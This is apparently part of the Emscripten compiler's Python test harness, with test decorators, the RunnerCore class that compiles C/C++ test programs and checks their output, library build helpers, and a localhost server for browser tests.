# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
def decorated(self):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self)
return decorated
def needs_dlfcn(func):
assert callable(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
# used for tests that fail now and then on CI, due to timing or other
# random causes. this tries the test a few times, looking for at least
# one pass
def flaky(f):
assert callable(f)
max_tries = 3
def decorated(self):
for i in range(max_tries - 1):
try:
f(self)
return
except Exception:
print('flaky...')
continue
# run the last time normally, to get a simpler stack trace
f(self)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
def limit_size(string, MAX=800 * 20):
if len(string) < MAX:
return string
return string[0:MAX // 2] + '\n[..]\n' + string[-MAX // 2:]
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'asm0',
'asm1',
'asm2',
'asm3',
'asm2g',
'asm2f',
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'asmi',
'asm2i',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
]
test_index = 0
class RunnerCore(unittest.TestCase):
emcc_args = []
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
save_dir = EMTEST_SAVE_DIR
save_JS = 0
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
env = {}
settings_mods = {}
temp_files_before_run = []
def is_emterpreter(self):
return self.get_setting('EMTERPRETIFY')
def is_wasm(self):
return self.is_wasm_backend() or self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or self.get_setting('WASM'):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if self.save_dir:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
# Use emscripten root for node module lookup
os.environ['NODE_PATH'] = path_from_root('node_modules')
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir. They may not be due to
# us, but e.g. the browser when running browser tests. Until we figure out a proper solution,
# ignore some temp file names that we see on our CI infrastructure.
ignorable_files = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout'
]
left_over_files = list(set(temp_files_after_run) - set(self.temp_files_before_run) - set(ignorable_files))
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
# Make sure we don't leave stuff around
# if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def hardcode_arguments(self, filename, args):
# Hardcode in the arguments, so js is portable without manual commandlinearguments
if not args:
return
js = open(filename).read()
create_test_file(filename, js.replace('run();', 'run(%s + Module["arguments"]);' % str(args)))
def prep_ll_run(self, filename, ll_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.o.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
if force_recompile or build_ll_hook:
if ll_file.endswith(('.bc', '.o')):
if ll_file != filename + '.o':
shutil.copy(ll_file, filename + '.o')
Building.llvm_dis(filename)
else:
shutil.copy(ll_file, filename + '.o.ll')
fix_target(filename + '.o.ll')
if build_ll_hook:
need_post = build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.pre') # for comparisons later
Building.llvm_dis(filename)
if build_ll_hook and need_post:
build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.post') # for comparisons later
Building.llvm_dis(filename)
Building.llvm_as(filename)
else:
if ll_file.endswith('.ll'):
safe_copy(ll_file, filename + '.o.ll')
fix_target(filename + '.o.ll')
Building.llvm_as(filename)
else:
safe_copy(ll_file, filename + '.o')
def get_emcc_args(self):
# TODO(sbc): We should probably unify Building.COMPILER_TEST_OPTS and self.emcc_args
return self.serialize_settings() + self.emcc_args + Building.COMPILER_TEST_OPTS
# Generate JS from ll
def ll_to_js(self, filename):
Building.emcc(filename + '.o', self.get_emcc_args(), filename + '.o.js')
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in [filename] + additional_files:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except:
pass
args = [PYTHON, EMCC] + self.get_emcc_args() + \
['-I', dirname, '-I', os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
Building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_run(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
self.ll_to_js(filename)
else:
# "fast", new path: just call emcc and go straight to JS
all_files = [filename] + additional_files + libraries
for i in range(len(all_files)):
if '.' not in all_files[i]:
shutil.move(all_files[i], all_files[i] + '.bc')
all_files[i] += '.bc'
args = [PYTHON, EMCC] + self.get_emcc_args() + \
['-I', dirname, '-I', os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
m = re.search(r"asm.js type error: '(\w+)' is not a (standard|supported) SIMD type", err)
if m:
# Bug numbers for missing SIMD types:
bugs = {
'Int8x16': 1136226,
'Int16x8': 1136226,
'Uint8x16': 1244117,
'Uint16x8': 1244117,
'Uint32x4': 1240796,
'Float64x2': 1124205,
}
simd = m.group(1)
if simd in bugs:
print(("\nWARNING: ignoring asm.js type error from {} due to implementation not yet available in SpiderMonkey." +
" See https://bugzilla.mozilla.org/show_bug.cgi?id={}\n").format(simd, bugs[simd]), file=sys.stderr)
err = err.replace(m.group(0), '')
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(Building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
self.assertEqual(line_endings.check_line_endings(filename), 0)
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
with chdir(self.get_dir()):
jsrun.run_js(filename, engine, args, check_timeout,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
assert 'strict warning:' not in ret, 'We should pass all strict mode checks: ' + ret
if EMTEST_VERBOSE:
print('-- being program output --')
print(ret, end='')
print('-- end program output --')
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2)
def assertIdentical(self, values, y):
if type(values) not in [list, tuple]:
values = [values]
for x in values:
if x == y:
return # success
self.fail("Expected to have '%s' == '%s', diff:\n\n%s" % (
limit_size(values[0]), limit_size(y),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(x.split('\n'), y.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
for value in values:
if value in string:
return # success
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')])),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
if not os.path.exists(ret):
os.makedirs(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args='help',
cache=True, env_init={}, cache_name_extra='', native=False):
if make_args == 'help':
make_args = ['-j', str(multiprocessing.cpu_count())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
hash_input = (str(Building.COMPILER_TEST_OPTS) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in Building.COMPILER_TEST_OPTS if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache is not None:
if cache and self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, copy_project=True, env_init=env_init,
native=native)
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default TOTAL_MEMORY=16MB is thus not enough
self.set_setting('TOTAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [PYTHON, EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
void bfunc();
void cfunc();
int _main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
self.emcc_args += ['--embed-file', '.@/']
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int _main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currenlty working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "_Z5bfuncv");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "_Z5cfuncv");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) == list
js_engines = [engine for engine in js_engines if engine and engine[0] not in [banned[0] for banned in self.banned_js_engines if banned]]
return js_engines
def do_run_from_file(self, src, expected_output, *args, **kwargs):
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=None, assert_identical=False):
if self.get_setting('ASYNCIFY') == 1 and self.is_wasm_backend():
self.skipTest("wasm backend doesn't support ASYNCIFY yet")
if force_c or (main_file is not None and main_file[-2:]) == '.c':
basename = 'src.c'
Building.COMPILER = to_cc(Building.COMPILER)
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
if not no_build:
self.build(src, dirname, filename, main_file=main_file, additional_files=additional_files, libraries=libraries, includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
js_engines = self.filtered_js_engines(js_engines)
js_file = filename + '.o.js'
if len(js_engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
if len(js_engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in js_engines: # make sure to get asm.js validation checks, using sm
js_engines = [SPIDERMONKEY_ENGINE]
else:
js_engines = js_engines[:1]
for engine in js_engines:
# print 'test in', engine
js_output = self.run_generated_code(engine, js_file, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
else:
self.assertContained(expected_output, js_output)
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
# shutil.rmtree(dirname) # TODO: leave no trace in memory. But for now nice for debugging
if self.save_JS:
global test_index
self.hardcode_arguments(js_file, args)
shutil.copyfile(js_file, os.path.join(TEMP_DIR, str(test_index) + '.js'))
test_index += 1
# No building - just process an existing .ll file (or .bc, which we turn into .ll)
def do_ll_run(self, ll_file, expected_output=None, args=[], js_engines=None,
output_nicerizer=None, force_recompile=False,
build_ll_hook=None, assert_returncode=None):
filename = os.path.join(self.get_dir(), 'src.cpp')
self.prep_ll_run(filename, ll_file, force_recompile, build_ll_hook)
self.ll_to_js(filename)
self.do_run(None,
expected_output,
args,
no_build=True,
js_engines=js_engines,
output_nicerizer=output_nicerizer,
assert_returncode=assert_returncode)
def get_freetype_library(self):
self.set_setting('DEAD_FUNCTIONS', self.get_setting('DEAD_FUNCTIONS') + ['_inflateEnd', '_inflate', '_inflateReset', '_inflateInit2_'])
return self.get_library('freetype', os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared'])
def get_poppler_library(self):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
Building.COMPILER_TEST_OPTS += [
'-I' + path_from_root('tests', 'freetype', 'include'),
'-I' + path_from_root('tests', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
Building.COMPILER_TEST_OPTS += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
poppler = self.get_library(
'poppler',
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init={'FONTCONFIG_CFLAGS': ' ', 'FONTCONFIG_LIBS': ' '},
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library('zlib', os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header("Content-type", 'application/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', urllib.unquote_plus(self.path), ']')
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write('COMMAND:' + url)
# move us to the right place to serve the files
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write('(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', urllib.unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
